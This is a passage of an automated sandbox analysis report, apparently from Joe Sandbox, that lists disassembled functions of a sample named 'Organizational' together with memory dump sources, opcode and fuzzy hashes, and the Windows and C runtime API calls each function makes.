                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_$_memset
                                                          • String ID:
                                                          • API String ID: 1505330794-0
                                                          • Opcode ID: a0d499200ea65ec64204ebf2ce8bd71cdee5410ba472ead645d7696e0d379b42
                                                          • Instruction ID: 422d0a2ca1848ffe09add21c8d74f889d2f958d73f43deaad909bd65ae388ed7
                                                          • Opcode Fuzzy Hash: a0d499200ea65ec64204ebf2ce8bd71cdee5410ba472ead645d7696e0d379b42
                                                          • Instruction Fuzzy Hash: 0A318FB0515B118FC721DF64D8C4697BBF8FB48304F000E2EF59A87250E7B1A995CB92
                                                          APIs
                                                          • __FF_MSGBANNER.LIBCMT ref: 00275953
                                                            • Part of subcall function 0027A39B: __NMSG_WRITE.LIBCMT ref: 0027A3C2
                                                            • Part of subcall function 0027A39B: __NMSG_WRITE.LIBCMT ref: 0027A3CC
                                                          • __NMSG_WRITE.LIBCMT ref: 0027595A
                                                            • Part of subcall function 0027A3F8: GetModuleFileNameW.KERNEL32(00000000,003153BA,00000104,00000004,00000001,00271003), ref: 0027A48A
                                                            • Part of subcall function 0027A3F8: ___crtMessageBoxW.LIBCMT ref: 0027A538
                                                            • Part of subcall function 002732CF: ___crtCorExitProcess.LIBCMT ref: 002732D5
                                                            • Part of subcall function 002732CF: ExitProcess.KERNEL32 ref: 002732DE
                                                            • Part of subcall function 00278D58: __getptd_noexit.LIBCMT ref: 00278D58
                                                          • RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,?,00000004,?,?,00271003,?), ref: 0027597F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 1372826849-0
                                                          • Opcode ID: 1af2bf9c48f30a2f6f0071ceb0bf611b5b90794024d9f06b187c0787ebc04e2f
                                                          • Instruction ID: 7d31eb74115bf52696542c3a37a05577b24975bad94b15d6bbade3b37e55bda7
                                                          • Opcode Fuzzy Hash: 1af2bf9c48f30a2f6f0071ceb0bf611b5b90794024d9f06b187c0787ebc04e2f
                                                          • Instruction Fuzzy Hash: 8001F932271B23DAE6116F359C4166EB2489F92770F50C826F61C9A1D1DEF08D214AE1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CALL
                                                          • API String ID: 0-4196123274
                                                          • Opcode ID: 06ee8998f684ecd9cb596dd9fb2b86b31ee9b0b52a61e58af1407f923af4dd2b
                                                          • Instruction ID: c3dfe180c8426228bdf6cef4c3f07cff9f762e0514ababb450db71ab37474f56
                                                          • Opcode Fuzzy Hash: 06ee8998f684ecd9cb596dd9fb2b86b31ee9b0b52a61e58af1407f923af4dd2b
                                                          • Instruction Fuzzy Hash: 14327B74528312DFCB24DF14C494A2AB7E1BF44301F55895DE88A8B362DB71ECA9CF86
                                                          APIs
                                                          • _strcat.LIBCMT ref: 002CE20C
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • _wcscpy.LIBCMT ref: 002CE29B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __itow__swprintf_strcat_wcscpy
                                                          • String ID:
                                                          • API String ID: 1012013722-0
                                                          • Opcode ID: b35a65edba573cd0bfbee3405199468811df82d98e5cfd4e0ca7498939ac583f
                                                          • Instruction ID: 5afdcfd7672768862790613c31cf9788ad6e3b0157ebf20bd0c4696e53cdf3fe
                                                          • Opcode Fuzzy Hash: b35a65edba573cd0bfbee3405199468811df82d98e5cfd4e0ca7498939ac583f
                                                          • Instruction Fuzzy Hash: F4912635A20514DFCB18EF18C491E69BBE5EF49314B55819DE80A8F3A2DB30ED65CF84
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3712363035-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: 0fbe69b39b9815c525586b288db122452a7d1e1e0d6b1900dd1bcf9fd48ac3a2
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: BA31B271A2010ADBD718DF58C4C0969F7A6FF59300B64CAA5E40ACB751EB71EDE5CB80
                                                          APIs
                                                          • IsThemeActive.UXTHEME ref: 00265FEF
                                                            • Part of subcall function 0027359C: __lock.LIBCMT ref: 002735A2
                                                            • Part of subcall function 0027359C: DecodePointer.KERNEL32(00000001,?,00266004,002A8892), ref: 002735AE
                                                            • Part of subcall function 0027359C: EncodePointer.KERNEL32(?,?,00266004,002A8892), ref: 002735B9
                                                            • Part of subcall function 00265F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00265F18
                                                            • Part of subcall function 00265F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00265F2D
                                                            • Part of subcall function 00265240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0026526C
                                                            • Part of subcall function 00265240: IsDebuggerPresent.KERNEL32 ref: 0026527E
                                                            • Part of subcall function 00265240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002652E6
                                                            • Part of subcall function 00265240: SetCurrentDirectoryW.KERNEL32(?), ref: 00265366
                                                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0026602F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                          • String ID:
                                                          • API String ID: 1438897964-0
                                                          • Opcode ID: cb7b9a1fb4138505bff0294fa836551aa44d0e85946817b99bea7b0301807188
                                                          • Instruction ID: 76361271a0efd0c49633788515235ebb0dcef5f96450027a300d6d7a74c69d49
                                                          • Opcode Fuzzy Hash: cb7b9a1fb4138505bff0294fa836551aa44d0e85946817b99bea7b0301807188
                                                          • Instruction Fuzzy Hash: 1D118E718183019BC311EF69EC4998AFBFCEF98310F00891AF44487261DFB09596CF95
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00263E72,?,?,?,00000000), ref: 00264327
                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00263E72,?,?,?,00000000), ref: 002A0717
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: dc6c842ef382e0a53a61c6e20eed67a790e88b2dfee4d206501d061f72109cca
                                                          • Instruction ID: 7c37895422e18e926cf05317f53c3c975c7e14c342064a4feb283c768fb9e559
                                                          • Opcode Fuzzy Hash: dc6c842ef382e0a53a61c6e20eed67a790e88b2dfee4d206501d061f72109cca
                                                          • Instruction Fuzzy Hash: CB018470194249BEF3252E148CCAFA67A9CAB01768F20C255FAD46A1D0C6F05CA59B14
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __lock_file_memset
                                                          • String ID:
                                                          • API String ID: 26237723-0
                                                          • Opcode ID: 11c6bba212661d3720d1baa7be01c83d21b07335045f5cb93a4c0f31c2d98d07
                                                          • Instruction ID: d6ebf661b2c75d848f78d1f5f2d08ce6abcfad75fd1099f034ec81dc74409ad9
                                                          • Opcode Fuzzy Hash: 11c6bba212661d3720d1baa7be01c83d21b07335045f5cb93a4c0f31c2d98d07
                                                          • Instruction Fuzzy Hash: 91014471C60659EBCF11AF66CC0599EBBA1EF80360F18C115F82C5A1A1D7B18A71DF92
                                                          APIs
                                                            • Part of subcall function 00278D58: __getptd_noexit.LIBCMT ref: 00278D58
                                                          • __lock_file.LIBCMT ref: 0027560B
                                                            • Part of subcall function 00276E3E: __lock.LIBCMT ref: 00276E61
                                                          • __fclose_nolock.LIBCMT ref: 00275616
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                          • String ID:
                                                          • API String ID: 2800547568-0
                                                          • Opcode ID: d2665c9f179b42209856330fce0f2463f18b0d4cb6dc7be12690319abdd0dda7
                                                          • Instruction ID: 12b085d9f01de8b9457ea40fa13bcd8cf460df606ed0fa0b83c6da782efbafb3
                                                          • Opcode Fuzzy Hash: d2665c9f179b42209856330fce0f2463f18b0d4cb6dc7be12690319abdd0dda7
                                                          • Instruction Fuzzy Hash: 6CF09071831B259AD721AF75880AB6EB7A1AF41334F55C209E42CAB1C1CFFC89219F51
                                                          APIs
                                                          • __lock_file.LIBCMT ref: 00275EB4
                                                          • __ftell_nolock.LIBCMT ref: 00275EBF
                                                            • Part of subcall function 00278D58: __getptd_noexit.LIBCMT ref: 00278D58
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2999321469-0
                                                          • Opcode ID: 276209685ff784639308e7004f4230c87e0dccfa010c01c5d9ab315890b05467
                                                          • Instruction ID: 7c1002b8a2c5a5a49a72d74b49697719350f23ca9dd50e56a160c4a65e77969a
                                                          • Opcode Fuzzy Hash: 276209685ff784639308e7004f4230c87e0dccfa010c01c5d9ab315890b05467
                                                          • Instruction Fuzzy Hash: FFF0A732971A259BE710BB74880675EB2906F01335F11C206E02CEB1C1CFB88A229F51
                                                          APIs
                                                          • _memset.LIBCMT ref: 00265AEF
                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00265B1F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell__memset
                                                          • String ID:
                                                          • API String ID: 928536360-0
                                                          • Opcode ID: 0c4fac5675e14e32f43543ed2398b522eb148e56bbf2165d4d384c788b84010d
                                                          • Instruction ID: 62c634dd48a671e772d0be711d72f045cd98b7db3ad32a6ea90cd11175af7c1e
                                                          • Opcode Fuzzy Hash: 0c4fac5675e14e32f43543ed2398b522eb148e56bbf2165d4d384c788b84010d
                                                          • Instruction Fuzzy Hash: A1F0A7708183189FD793CF24EC897E577BC970430CF0441E9AA4896296D7B10BD9CF55
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LoadString$__swprintf
                                                          • String ID:
                                                          • API String ID: 207118244-0
                                                          • Opcode ID: a42a1bc2554128b6374980d81805da19c608eb0990fd7bfffec0f0f9e76036dc
                                                          • Instruction ID: 754af123e2c2da6eef4f78929ea23700694c4294234ab4b4725473115eddcded
                                                          • Opcode Fuzzy Hash: a42a1bc2554128b6374980d81805da19c608eb0990fd7bfffec0f0f9e76036dc
                                                          • Instruction Fuzzy Hash: 44B15D74A2010ADFCB14EF94D891EEEB7B5FF48310F24815AF91AA7291DB70A961CF50
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                          • Instruction ID: e2706c3885378a0055fcacd0200d3cf1392d9718985e6875682c732867b7fe6c
                                                          • Opcode Fuzzy Hash: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                          • Instruction Fuzzy Hash: F261DF70620206EFDB10DF54C882A7AB7F5EF04311F11826DEC1A8B281D774EDA8CB65
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8672b74732d04f1a1a3456310a0e4a45332a6bd9c0faeb0ec7ebd4d4c66ecf9b
                                                          • Instruction ID: 13ebf3213148d6afc3703c02dae40aa51a531718cb50b172f7ad0f5cb576f4fc
                                                          • Opcode Fuzzy Hash: 8672b74732d04f1a1a3456310a0e4a45332a6bd9c0faeb0ec7ebd4d4c66ecf9b
                                                          • Instruction Fuzzy Hash: 5551A1317206149BCF14EF68C991E6E77A6AF49314F148068FC0AAB392CB30ED65CF55
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                          • Instruction ID: c78125ecfdcd13978c628921e56405240e80144441a771ad6edfb36811059e97
                                                          • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                          • Instruction Fuzzy Hash: 3631AE79624A03DFD724DF18D490A22F7A0FF08320754C569E98A8B791EB70E9A1CB90
                                                          APIs
                                                          • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 002641B2
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 8a1a79db1c4b47088021ce9626a95613be9103b80fb8736e8f731941605f9e91
                                                          • Instruction ID: 1f1292a354a4021edce3d2bab1b620e763ca52e2f534691f77c83a4da8173671
                                                          • Opcode Fuzzy Hash: 8a1a79db1c4b47088021ce9626a95613be9103b80fb8736e8f731941605f9e91
                                                          • Instruction Fuzzy Hash: B1316C71A1061AEFCB18EF6CC880AADB7B5FF59310F148669E85997710D770BDE08B90
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: a96a6403e16187c338efcfff9dc128a9c8d2f4fee9a5f12e0533b61c046c4d4d
                                                          • Instruction ID: d9c8bbaad9a26a9e8fb314531ae40d33876317277c79c20c5fea5dc6d976ed5f
                                                          • Opcode Fuzzy Hash: a96a6403e16187c338efcfff9dc128a9c8d2f4fee9a5f12e0533b61c046c4d4d
                                                          • Instruction Fuzzy Hash: 4E411A745183518FDB24DF14C488B1ABBE1BF45319F4984ACE8899B362C371ECA9CF56
                                                          APIs
                                                            • Part of subcall function 00264B29: FreeLibrary.KERNEL32(00000000,?), ref: 00264B63
                                                            • Part of subcall function 0027547B: __wfsopen.LIBCMT ref: 00275486
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002627AF,?,00000001), ref: 002649F4
                                                            • Part of subcall function 00264ADE: FreeLibrary.KERNEL32(00000000), ref: 00264B18
                                                            • Part of subcall function 002648B0: _memmove.LIBCMT ref: 002648FA
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                          • String ID:
                                                          • API String ID: 1396898556-0
                                                          • Opcode ID: e300412a493a6532ff1843f0a2e183188c3e2a2c13b494a320a2abc1f0c14e97
                                                          • Instruction ID: c96df94ca9ebdb76268452d55a0652f9cc6bade418e183f7ff7a620e2c61bc27
                                                          • Opcode Fuzzy Hash: e300412a493a6532ff1843f0a2e183188c3e2a2c13b494a320a2abc1f0c14e97
                                                          • Instruction Fuzzy Hash: DF11C831670205BBCB10FFA0CC56FAE77A99F41701F20441DF981A6181EEB49EA1AB54
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
